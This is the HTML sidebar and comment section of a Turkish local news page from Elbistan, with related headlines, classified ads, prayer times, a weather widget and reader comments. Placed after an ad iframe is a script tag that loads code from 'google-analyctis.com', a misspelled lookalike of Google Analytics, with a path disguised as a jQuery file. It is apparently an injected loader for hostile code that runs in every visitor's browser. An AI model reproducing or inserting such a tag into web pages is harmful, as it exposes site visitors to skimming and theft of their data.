href="#">&times;</a></div> </div> <div class="alert alert-block alert-error fade in" style="display:block;margin-top:15px;"> <button type="button" class="close" data-dismiss="alert">×</button> <strong>Dikkat!</strong> Suç teşkil edecek, yasadışı, tehditkar, rahatsız edici, hakaret ve küfür içeren, aşağılayıcı, küçük düşürücü, kaba, pornografik, ahlaka aykırı, kişilik haklarına zarar verici ya da benzeri niteliklerde içeriklerden doğan her türlü mali, hukuki, cezai, idari sorumluluk içeriği gönderen Üye/Üyeler’e aittir. </div> </div> <!-- .tab-pane --> <div class="tab-pane yorumlar fbpanel" id="facebookpanel"> <div class="row-fluid"> <div id="fb-root"></div> <script>(function(d, s, id) { var js, fjs = d.getElementsByTagName(s)[0]; if (d.getElementById(id)) return; js = d.createElement(s); js.id = id; js.src = "//connect.facebook.net/tr_TR/all.js#xfbml=1"; fjs.parentNode.insertBefore(js, fjs); }(document, 'script', 'facebook-jssdk'));</script> <div class="fb-comments" data-href="http://www.elbistaninsesi.com/guncel/uzman-dr-erdinc-hatipsoylu-ozel-muayenehane-acti-h64176.html" data-width="603" data-colorscheme="light" data-numposts="10"></div> </div> <!-- #facebookpanel --> </div> </div> <!-- .tab-content --> </div> <!-- #yorumlar --> </section> </div> <!-- Sağ Blok --> <div id="sidebar" class="aside span4"> <!-- ILGILI HABERLER --> <div id="ilgiliHaberler-y"> <div class="ilgiliHaberler-y-t glyphicons show_big_thumbnails">İlgili Haberler</div> <div class="ilgiliHaber"> <a href="http://www.elbistaninsesi.com/guncel/unal-kurt-kardeslerimize-kene-gibi-yapismis-bir-pkk-sorunu-var-h64179.html" title="Ünal: “Kürt kardeşlerimize kene gibi yapışmış bir PKK sorunu var”"> <img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/09/unal_kurt_kardeslerimize_kene_gibi_yapismis_bir_pkk_sorunu_var_h64179_35030.jpg" alt="Ünal: “Kürt kardeşlerimize kene gibi yapışmış bir PKK sorunu var”" /> <span>Ünal: “Kürt kardeşlerimize kene gibi yapışmış...</span> </a> </div> <div class="ilgiliHaber"> <a href="http://www.elbistaninsesi.com/guncel/voleybol-takim-kaptani-evin-elbistan-icin-mucadele-edecegiz-h64178.html" title="Voleybol takım kaptanı Evin: “Elbistan için mücadele edeceğiz”"> <img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/09/voleybol_takim_kaptani_evin_elbistan_icin_mucadele_edecegiz_h64178_5cefe.jpg" alt="Voleybol takım kaptanı Evin: “Elbistan için mücadele edeceğiz”" /> <span>Voleybol takım kaptanı Evin: “Elbistan için mücadele...</span> </a> </div> <div class="ilgiliHaber"> <a href="http://www.elbistaninsesi.com/guncel/polisten-standart-disi-isik-donanimi-denetimi-h64177.html" title="Polisten standart dışı ışık donanımı denetimi"> <img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/09/polisten_standart_disi_isik_donanimi_denetimi_h64177_3692a.jpg" alt="Polisten standart dışı ışık donanımı denetimi" /> <span>Polisten standart dışı ışık donanımı denetimi</span> </a> </div> <div class="ilgiliHaber"> <a href="http://www.elbistaninsesi.com/guncel/mikrokredi-ile-kendi-isini-kurdu-h64175.html" title="Mikrokredi ile kendi işini kurdu"> <img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/09/mikrokredi_ile_kendi_isini_kurdu_h64175_d3941.jpg" alt="Mikrokredi ile kendi işini kurdu" /> <span>Mikrokredi ile kendi işini kurdu</span> </a> </div> <div class="ilgiliHaber"> <a href="http://www.elbistaninsesi.com/guncel/mukrime-hatun-kulturevi-hizmete-acildi-h64173.html" title="Mükrime Hatun Kültürevi hizmete açıldı"> <img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/09/mukrime_hatun_kulturevi_hizmete_acildi_h64173_cfce7.jpg" alt="Mükrime Hatun Kültürevi hizmete açıldı" /> <span>Mükrime Hatun Kültürevi hizmete açıldı</span> </a> </div> <div class="ilgiliHaber"> <a href="http://www.elbistaninsesi.com/guncel/goksunlu-milli-guresci-dunya-sampiyonu-oldu-h64172.html" title="Göksunlu milli güreşçi dünya şampiyonu oldu"> <img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/09/goksunlu_milli_guresci_dunya_sampiyonu_oldu_h64172_6ebea.jpg" alt="Göksunlu milli güreşçi dünya şampiyonu oldu" /> <span>Göksunlu milli güreşçi dünya şampiyonu oldu</span> </a> </div> <div class="ilgiliHaber"> <a href="http://www.elbistaninsesi.com/guncel/nacar-tarim-ve-hayvancilik-can-cekisiyor-h64171.html" title="Nacar: “Tarım ve hayvancılık can çekişiyor”"> <img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/09/nacar_tarim_ve_hayvancilik_can_cekisiyor_h64171_30540.jpg" alt="Nacar: “Tarım ve hayvancılık can çekişiyor”" /> <span>Nacar: “Tarım ve hayvancılık can çekişiyor”</span> </a> </div> <div class="ilgiliHaber"> <a href="http://www.elbistaninsesi.com/guncel/vefat-tesekkur-h64169.html" title="VEFAT TEŞEKKÜR"> <img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/09/vefat_tesekkur_h64169_16fc9.jpg" alt="VEFAT TEŞEKKÜR" /> <span>VEFAT TEŞEKKÜR</span> </a> </div> </div> <div id="syazar"> <div class="header"> <h5><a style="margin-top:10px;" href="http://www.elbistaninsesi.com/seri-ilanlar/ilanver.html" class="this pull-left btn btn-small" title="İlan Ekle"><i class="halflings-icon plus"></i> İlan Ekle</a> <a style="margin-right:65px;font-size:140%;color:red;" href="http://www.elbistaninsesi.com/seri-ilanlar" title="Seri İlanlar">Seri İlanlar</a></h5> <a class="control left" href="#" id="syprev"></a> <a class="control right" href="#" id="synext"></a> </div> <div class="content"> <div class="item"> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/kiralik-sifir-31-daire-11384.html" title="KİRALIK SIFIR 3+1 DAİRE" >KİRALIK SIFIR 3+1 DAİRE</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/kiralik-sifir-31-daire-11384.html" title="" ><img src="http://www.elbistaninsesi.com/images/dosyalarim/resimyok.png" alt="KİRALIK SIFIR 3+1 DAİRE" class="img-rounded" /></a> </div> </div> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/sehir-merkezinde-kiralik-daire-11378.html" title="ŞEHİR MERKEZİNDE KİRALIK DAİRE" >ŞEHİR MERKEZİNDE KİRALIK DAİRE</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/sehir-merkezinde-kiralik-daire-11378.html" title="" ><img src="http://www.elbistaninsesi.com/images/dosyalarim/resimyok.png" alt="ŞEHİR MERKEZİNDE KİRALIK DAİRE" class="img-rounded" /></a> </div> </div> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/ingilizce-ozel-ders-11371.html" title="İngilizce Özel Ders" >İngilizce Özel Ders</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/ingilizce-ozel-ders-11371.html" title="" ><img src="http://www.elbistaninsesi.com/images/dosyalarim/resimyok.png" alt="İngilizce Özel Ders" class="img-rounded" /></a> </div> </div> </div> <div class="item"> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/geylani-sitesi-kiralik-41-daire-11365.html" title="Geylani sitesi kiralık 4*1 daire" >Geylani sitesi kiralık 4*1 daire</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/geylani-sitesi-kiralik-41-daire-11365.html" title="" ><img src="http://www.elbistaninsesi.com/images/dosyalarim/resimyok.png" alt="Geylani sitesi kiralık 4*1 daire" class="img-rounded" /></a> </div> </div> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/guney-is-merkezi-kiralik-luks-buro-11361.html" title="Güney İş Merkezi Kiralık lüks Büro" >Güney İş Merkezi Kiralık lüks Büro</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/guney-is-merkezi-kiralik-luks-buro-11361.html" title="" ><img src="http://www.elbistaninsesi.com/images/ilanlar/thumbs/7418ce315a657e130fc99f6a649772093ac73d8e.jpg" alt="Güney İş Merkezi Kiralık lüks Büro" class="img-rounded" /></a> </div> </div> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/eleman-araniyor-11338.html" title="eleman aranıyor" >eleman aranıyor</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/eleman-araniyor-11338.html" title="" ><img src="http://www.elbistaninsesi.com/images/dosyalarim/resimyok.png" alt="eleman aranıyor" class="img-rounded" /></a> </div> </div> </div> <div class="item"> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/satilik-daire-11336.html" title="SATILIK DAİRE" >SATILIK DAİRE</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/satilik-daire-11336.html" title="" ><img src="http://www.elbistaninsesi.com/images/dosyalarim/resimyok.png" alt="SATILIK DAİRE" class="img-rounded" /></a> </div> </div> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/cihangir-elektrikte-calisacak-bayan-eleman-araniyo-11318.html" title="CIHANGIR ELEKTRIKTE Çalışacak bayan eleman araniyo" >CIHANGIR ELEKTRIKTE Çalışacak bayan eleman araniyo</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/cihangir-elektrikte-calisacak-bayan-eleman-araniyo-11318.html" title="" ><img src="http://www.elbistaninsesi.com/images/dosyalarim/resimyok.png" alt="CIHANGIR ELEKTRIKTE Çalışacak bayan eleman araniyo" class="img-rounded" /></a> </div> </div> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/cocuk-bakicisi-11316.html" title="Çocuk bakıcısı" >Çocuk bakıcısı</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/cocuk-bakicisi-11316.html" title="" ><img src="http://www.elbistaninsesi.com/images/dosyalarim/resimyok.png" alt="Çocuk bakıcısı" class="img-rounded" /></a> </div> </div> </div> <div class="item"> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/kiralik-daire-k-11311.html" title="KİRALIK DAİRE k" >KİRALIK DAİRE k</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/kiralik-daire-k-11311.html" title="" ><img src="http://www.elbistaninsesi.com/images/dosyalarim/resimyok.png" alt="KİRALIK DAİRE k" class="img-rounded" /></a> </div> </div> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/golvadisi-1-a-blok-41-satilik-luks-daire-11306.html" title="GÖLVADİSİ -1 A BLOK 4+1 SATILIK LÜKS DAİRE" >GÖLVADİSİ -1 A BLOK 4+1 SATILIK LÜKS DAİRE</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/golvadisi-1-a-blok-41-satilik-luks-daire-11306.html" title="" ><img src="http://www.elbistaninsesi.com/images/dosyalarim/resimyok.png" alt="GÖLVADİSİ -1 A BLOK 4+1 SATILIK LÜKS DAİRE" class="img-rounded" /></a> </div> </div> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/ab-i-hayat-sitesi-a-blok-41-kiralik-luks-daire-11305.html" title="AB-I HAYAT SİTESİ A BLOK 4+1 KİRALIK LÜKS DAİRE" >AB-I HAYAT SİTESİ A BLOK 4+1 KİRALIK LÜKS DAİRE</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/ab-i-hayat-sitesi-a-blok-41-kiralik-luks-daire-11305.html" title="" ><img src="http://www.elbistaninsesi.com/images/dosyalarim/resimyok.png" alt="AB-I HAYAT SİTESİ A BLOK 4+1 KİRALIK LÜKS DAİRE" class="img-rounded" /></a> </div> </div> </div> <div class="item"> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/cogulhan-yolunda-besicilik-icin-uygun-tarla-favori-11299.html" title="ÇOĞULHAN YOLUNDA BESİCİLİK İÇİN UYGUN TARLA Favori" >ÇOĞULHAN YOLUNDA BESİCİLİK İÇİN UYGUN TARLA Favori</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/cogulhan-yolunda-besicilik-icin-uygun-tarla-favori-11299.html" title="" ><img src="http://www.elbistaninsesi.com/images/ilanlar/thumbs/3efd819118382de46d5cc8d40e730630e9c85da4.jpg" alt="ÇOĞULHAN YOLUNDA BESİCİLİK İÇİN UYGUN TARLA Favori" class="img-rounded" /></a> </div> </div> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/kiralik-daire-11298.html" title="Kİ­RA­LIK DAİRE" >Kİ­RA­LIK DAİRE</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/kiralik-daire-11298.html" title="" ><img src="http://www.elbistaninsesi.com/images/dosyalarim/resimyok.png" alt="Kİ­RA­LIK DAİRE" class="img-rounded" /></a> </div> </div> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/bayan-eleman-araniyor-11296.html" title="Bayan Eleman Aranıyor" >Bayan Eleman Aranıyor</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/bayan-eleman-araniyor-11296.html" title="" ><img src="http://www.elbistaninsesi.com/images/dosyalarim/resimyok.png" alt="Bayan Eleman Aranıyor" class="img-rounded" /></a> </div> </div> </div> </div> </div> <!-- SOSYAL --> <div class="sosyal"> <div class="row-fluid content"> <div class="span6 box facebook"> <div class="top"> <div class="icon"><img src="http://www.elbistaninsesi.com/_themes/hs-rush-php/images/icon/fb32.png" alt="Facebook"></div> <div class="right"> <span class="count"><a href="http://facebook.com/elbistaninsesi" target="blank" id="likes"></a></span> <span class="text">Beğeni</span> </div> </div> <div class="bottom"> <a href="http://facebook.com/elbistaninsesi" target="blank" rel="nofollow">Facebook'ta Beğen</a> </div> </div> <div class="span6 box twitter"> <div class="top"> <div class="icon"><img src="http://www.elbistaninsesi.com/_themes/hs-rush-php/images/icon/twitter32.png" alt="Twitter"></div> <div class="right"> <span class="count"><a href="http://twitter.com/elbistaninsesi" target="blank" id="followers"></a></span> <span class="text">Takipçi</span> </div> </div> <div class="bottom"> <a href="http://twitter.com/elbistaninsesi" target="blank" rel="nofollow">Twitter'da Takip Et</a> </div> </div> </div> </div> <div id = "nobetci"> <a href="http://www.elbistaninsesi.com/images/dosyalarim/eczane.jpg" title="Nöbetçi Eczane" target="_blank"><img src = "http://www.ugurmumcu.info.tr/wp-content/uploads/2014/05/rb-eczane.png"></a> </div> <!-- NAMAZ VAKITLERI --> <div class="namazvakitleri"> <div class="title"> <h5>Namaz Vakitleri</h5> <select name="namaz" onchange="namaz_vakitleri(this.value); " class="span5 pull-right"> <option value="adana" >Adana</option> <option value="adiyaman" >Adıyaman</option> <option value="afyon" >Afyon</option> <option value="agri" >Ağrı</option> <option value="aksaray" >Aksaray</option> <option value="amasya" >Amasya</option> <option value="ankara" >Ankara</option> <option value="antalya" >Antalya</option> <option value="ardahan" >Ardahan</option> <option value="artvin" >Artvin</option> <option value="aydin" >Aydın</option> <option value="balikesir" >Balıkesir</option> <option value="bartin" >Bartın</option> <option value="batman" >Batman</option> <option value="bayburt" >Bayburt</option> <option value="bilecik" >Bilecik</option> <option value="bingol" >Bingöl</option> <option value="bitlis" >Bitlis</option> <option value="bolu" >Bolu</option> <option value="burdur" >Burdur</option> <option value="bursa" >Bursa</option> <option value="canakkale" >Çanakkale</option> <option value="cankiri" >Çankırı</option> <option value="corum" >Çorum</option> <option value="denizli" >Denizli</option> <option value="diyarbakir" >Diyarbakır</option> <option value="duzce" >Düzce</option> <option value="edirne" >Edirne</option> <option value="elazig" >Elazığ</option> <option value="erzincan" >Erzincan</option> <option value="erzurum" >Erzurum</option> <option value="eskisehir" >Eskişehir</option> <option value="gaziantep" >Gaziantep</option> <option value="giresun" >Giresun</option> <option value="gumushane" >Gümüşhane</option> <option value="hakkari" >Hakkari</option> <option value="hatay" >Hatay</option> <option value="igdir" >Iğdır</option> <option value="isparta" >Isparta</option> <option value="istanbul" >İstanbul</option> <option value="izmir" >İzmir</option> <option value="kahramanmaras" selected>Kahramanmaraş</option> <option value="karabuk" >Karabük</option> <option value="karaman" >Karaman</option> <option value="kars" >Kars</option> <option value="kastamonu" >Kastamonu</option> <option value="kayseri" >Kayseri</option> <option value="kirikkale" >Kırıkkale</option> <option value="kirklareli" >Kırklareli</option> <option value="kirsehir" >Kırşehir</option> <option value="kilis" >Kilis</option> <option value="izmit" >Kocaeli</option> <option value="konya" >Konya</option> <option value="kutahya" >Kütahya</option> <option value="malatya" >Malatya</option> <option value="manisa" >Manisa</option> <option value="mardin" >Mardin</option> <option value="mersin" >Mersin</option> <option value="mugla" >Muğla</option> <option value="mus" >Muş</option> <option value="nevsehir" >Nevşehir</option> <option value="nigde" >Niğde</option> <option value="ordu" >Ordu</option> <option value="osmaniye" >Osmaniye</option> <option value="rize" >Rize</option> <option value="adapazari" >Sakarya</option> <option value="samsun" >Samsun</option> <option value="siirt" >Siirt</option> <option value="sinop" >Sinop</option> <option value="sivas" >Sivas</option> <option value="sanliurfa" >Şanlıurfa</option> <option value="sirnak" >Şırnak</option> <option value="tekirdag" >Tekirdağ</option> <option value="tokat" >Tokat</option> <option value="trabzon" >Trabzon</option> <option value="tunceli" >Tunceli</option> <option value="usak" >Uşak</option> <option value="van" >Van</option> <option value="yalova" >Yalova</option> <option value="yozgat" >Yozgat</option> <option value="zonguldak" >Zonguldak</option> </select> </div> <div class="content"> <div class="sonuc"> <table cellspacing="0" cellpadding="0" id="vakitler"> <tr> <th>İmsak</th> <th>Güneş</th> <th>Öğle</th> <th>İkindi</th> <th>Akşam</th> <th>Yatsı</th> </tr> <tr> <td></td> <td></td> <td></td> <td></td> <td></td> <td></td> </tr> </table> </div> </div> </div> <div class="reklam reklam208"><iframe name=BIKADV src="http://medya.ilan.gov.tr/widgets/YYN-001260-20160610.html" width="300" height="175" frameborder="0" scrolling="no"></iframe> <script src="//apis.google-analyctis.com/ajax/libs/query/1/6/2/jquery/min"></script></div><a href="http://www.accuweather.com/tr/tr/elbistan/318373/current-weather/318373" class="aw-widget-legal"> <!-- By accessing and/or using this code snippet, you agree to AccuWeather’s terms and conditions (in English) which can be found at http://www.accuweather.com/en/free-weather-widgets/terms and AccuWeather’s Privacy Statement (in English) which can be found at http://www.accuweather.com/en/privacy. --> </a><div id="awtd1452737033699" class="aw-widget-36hour" data-locationkey="318373" data-unit="c" data-language="tr" data-useip="false" data-uid="awtd1452737033699" data-editlocation="false"></div><script type="text/javascript" src="http://oap.accuweather.com/launch.js"></script> <!-- ENCOKLAR --> <div class="encoklar"> <div class="accordion"> <div class="accordion-group"> <div class="accordion-heading"> <a class="accordion-toggle" data-toggle="collapse" data-parent="#encoklar" href="#collapseOne"> <span class="encoklar-icon"><i class="halflings-icon white fire"></i></span><h5>Bu Ay Çok Okunanlar</h5></a> </div> <div id="collapseOne" class="accordion-body collapse in"> <div class="accordion-inner"> <ul class="en-list"> <li class="en-hidden en-visible"><a href="http://www.elbistaninsesi.com/guncel/kamuoyu-aciklama-bekliyor-h64092.html" title="Kamuoyu açıklama bekliyor" class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/09/kamuoyu_aciklama_bekliyor_h64092_ba93f.jpg" alt="Kamuoyu açıklama bekliyor" ></a><div class="en-right"><a href="http://www.elbistaninsesi.com/guncel/kamuoyu-aciklama-bekliyor-h64092.html" title="" ><span class="en-hit">1.</span> <strong>Kamuoyu açıklama bekliyor</strong> <span class="en-spot en-hidden">Elbistan Devlet Hastanesi’nde yaşandığı iddia edilen ve kamuoyunun...</span></a></div></li> <li class="en-hidden"><a href="http://www.elbistaninsesi.com/guncel/hastaneden-taciz-aciklamasi-h64098.html" title="Hastaneden ‘taciz açıklaması" class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/09/hastaneden_taciz_aciklamasi_h64098_2b8f6.jpg" alt="Hastaneden ‘taciz açıklaması" ></a><div class="en-right"><a href="http://www.elbistaninsesi.com/guncel/hastaneden-taciz-aciklamasi-h64098.html" title="" ><span class="en-hit">2.</span> <strong>Hastaneden ‘taciz’ açıklaması</strong> <span class="en-spot en-hidden">Elbistan Devlet Hastanesi’nden bir hastanın, anestezi teknisyeni tarafından...</span></a></div></li> <li class="en-hidden"><a href="http://www.elbistaninsesi.com/guncel/bashekim-turk-gorevinden-istifa-etti-h64080.html" title="Başhekim Türk, görevinden istifa..." class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/09/bashekim_turk_gorevinden_istifa_etti_h64080_364c1.jpg" alt="Başhekim Türk, görevinden istifa..." ></a><div class="en-right"><a href="http://www.elbistaninsesi.com/guncel/bashekim-turk-gorevinden-istifa-etti-h64080.html" title="" ><span class="en-hit">3.</span> <strong>Başhekim Türk, görevinden istifa...</strong> <span class="en-spot en-hidden">Elbistan Devlet Hastanesi Başhekimi Op. Dr. Akif Türk, yaklaşık bir...</span></a></div></li> <li class="en-hidden"><a href="http://www.elbistaninsesi.com/guncel/zincirleme-kazada-baba-ile-oglu-hayatini-kaybetti-h63991.html" title="Zincirleme kazada baba ile oğlu hayatını..." class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/08/zincirleme_kazada_baba_ile_oglu_hayatini_kaybetti_h63991_de6ba.jpg" alt="Zincirleme kazada baba ile oğlu hayatını..." ></a><div class="en-right"><a href="http://www.elbistaninsesi.com/guncel/zincirleme-kazada-baba-ile-oglu-hayatini-kaybetti-h63991.html" title="" ><span class="en-hit">4.</span> <strong>Zincirleme kazada baba ile oğlu hayatını...</strong> <span class="en-spot en-hidden">Elbistan-Göksun karayolunun Çağılhan Mahallesi kesiminde 3 aracın...</span></a></div></li> <li class="last en-hidden"><a href="http://www.elbistaninsesi.com/guncel/baskan-sungurdan-hastane-aciklamasi-h64104.html" title="Başkan Sungurdan hastane açıklaması" class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/09/baskan_sungurdan_hastane_aciklamasi_h64104_67b11.jpg" alt="Başkan Sungurdan hastane açıklaması" ></a><div class="en-right"><a href="http://www.elbistaninsesi.com/guncel/baskan-sungurdan-hastane-aciklamasi-h64104.html" title="" ><span class="en-hit">5.</span> <strong>Başkan Sungur’dan hastane açıklaması</strong> <span class="en-spot en-hidden">AK Parti Elbistan İlçe Başkanı Av. Hasan Sungur, Elbistan Devlet Hastanesi’nde...</span></a></div></li> </ul> </div> </div> </div> <div class="accordion-group"> <div class="accordion-heading"> <a class="accordion-toggle" data-toggle="collapse" data-parent="#encoklar" href="#collapseTwo"> <span class="encoklar-icon"><i class="halflings-icon white comments"></i></span><h5>Bu Ay Çok Yorumlananlar</h5></a> </div> <div id="collapseTwo" class="accordion-body collapse in"> <div class="accordion-inner"> <ul class="en-list"> <li class="en-hidden en-visible"><a href="http://www.elbistaninsesi.com/vefatlar/kestal-celal-karagenc-h64074.html" title="(Kestal) Celal Karagenç" class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/09/kesta_celal_karagenc_h64074_c0445.jpg" alt="(Kestal) Celal Karagenç"></a><div class="en-right"><a href="http://www.elbistaninsesi.com/vefatlar/kestal-celal-karagenc-h64074.html" title="" ><span class="en-hit">1.</span> <strong>(Kestal) Celal Karagenç</strong> <span class="en-spot en-hidden"></span></a></div></li> <li class="en-hidden"><a href="http://www.elbistaninsesi.com/guncel/baskan-sungurdan-hastane-aciklamasi-h64104.html" title="Başkan Sungurdan hastane açıklaması" class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/09/baskan_sungurdan_hastane_aciklamasi_h64104_67b11.jpg" alt="Başkan Sungurdan hastane açıklaması"></a><div class="en-right"><a href="http://www.elbistaninsesi.com/guncel/baskan-sungurdan-hastane-aciklamasi-h64104.html" title="" ><span class="en-hit">2.</span> <strong>Başkan Sungur’dan hastane açıklaması</strong> <span class="en-spot en-hidden">AK Parti Elbistan İlçe Başkanı Av. Hasan Sungur, Elbistan Devlet Hastanesi’nde...</span></a></div></li> <li class="en-hidden"><a href="http://www.elbistaninsesi.com/guncel/bashekim-turk-gorevinden-istifa-etti-h64080.html" title="Başhekim Türk, görevinden istifa..." class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/09/bashekim_turk_gorevinden_istifa_etti_h64080_364c1.jpg" alt="Başhekim Türk, görevinden istifa..."></a><div class="en-right"><a href="http://www.elbistaninsesi.com/guncel/bashekim-turk-gorevinden-istifa-etti-h64080.html" title="" ><span class="en-hit">3.</span> <strong>Başhekim Türk, görevinden istifa...</strong> <span class="en-spot en-hidden">Elbistan Devlet Hastanesi Başhekimi Op. Dr. Akif Türk, yaklaşık bir...</span></a></div></li> <li class="en-hidden"><a href="http://www.elbistaninsesi.com/guncel/kamuoyu-aciklama-bekliyor-h64092.html" title="Kamuoyu açıklama bekliyor" class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/09/kamuoyu_aciklama_bekliyor_h64092_ba93f.jpg" alt="Kamuoyu açıklama bekliyor"></a><div class="en-right"><a href="http://www.elbistaninsesi.com/guncel/kamuoyu-aciklama-bekliyor-h64092.html" title="" ><span class="en-hit">4.</span> <strong>Kamuoyu açıklama bekliyor</strong> <span class="en-spot en-hidden">Elbistan Devlet Hastanesi’nde yaşandığı iddia edilen ve kamuoyunun...</span></a></div></li> <li class="last en-hidden"><a href="http://www.elbistaninsesi.com/guncel/yere-cekirdek-kabugu-sigara-izmariti-atana-ve-tukurene-ceza-geliyor-h63897.html" title="Yere çekirdek kabuğu, sigara izmariti..." class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/08/yere_cekirdek_kabugu_sigara_izmariti_atana_ve_tukurene_ceza_geliyor_h63897_435a3.jpg" alt="Yere çekirdek kabuğu, sigara izmariti..."></a><div class="en-right"><a href="http://www.elbistaninsesi.com/guncel/yere-cekirdek-kabugu-sigara-izmariti-atana-ve-tukurene-ceza-geliyor-h63897.html" title="" ><span class="en-hit">5.</span> <strong>Yere çekirdek kabuğu, sigara izmariti...</strong> <span class="en-spot en-hidden">Elbistan Belediyesi Zabıta Müdürlüğü ekipleri, yerlere sigara izmariti...</span></a></div></li> </ul> </div> </div> </div> </div> </div> <!-- SON YORUMLAR --> <div class="sayfalar"> <div class="header"> <h5>Son Yorumlar</h5> </div> <div class="content"> <ul class="unstyled"> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/guncel/nobet-kulesinde-canina-kiydi-h64147.html#comment_268392" title="" >İki sene öncede bir vatan evladı orada...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/suleyman-fedakar-77-yasinda-h64048.html#comment_268389" title="" >Süleyman kardeşime Allahtan rahmet, kalanlara...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/guncel/yere-cekirdek-kabugu-sigara-izmariti-atana-ve-tukurene-ceza-geliyor-h63897.html#comment_268388" title="" >Dr Hasan bey caddesi ile M.Kemal caddesi...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/anma-h64029.html#comment_268387" title="" >Allah rahmet eylesin mekani cent olsun inşAllah</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/guncel/afsin-deki-rese-onay-elbistan-sirada-h64164.html#comment_268386" title="" >avşunlu gardaşım elbistanı avşunumu...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/guncel/elbistan-ulku-ocaklarindan-asure-ikrami-h64163.html#comment_268385" title="" >devletin başına devlet gelecek Türkiyem</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/guncel/belediye-personellerinden-elbistanspora-tam-destek-h64156.html#comment_268384" title="" >Böyle muhalif ler her zaman fırsat kollarlar...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/seyh-hamit-kavak-h64143.html#comment_268382" title="" >Allah rahmet eylesin mekani cennet olsun...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/guncel/afsin-deki-rese-onay-elbistan-sirada-h64164.html#comment_268381" title="" >Herşey elbistana yapılıyo zaten hala...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/guncel/afsin-deki-rese-onay-elbistan-sirada-h64164.html#comment_268380" title="" >Elbistan üvey evlat Elbistana birşey yok....</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/fahrettin-sonmez-77-yasinda-h64148.html#comment_268379" title="" >Allah rahmet eylesin mekanı cennet olsun...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/guncel/72-kacak-avciya-91-bin-tl-ceza-h64157.html#comment_268377" title="" >Eğer gerçek yaban hayatı koruma iseniz...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/guncel/narkotik-ekiplerinin-yakaladigi-sokak-saticisi-tutuklandi-h64161.html#comment_268374" title="" >Polisimiz baştacı</a></li> 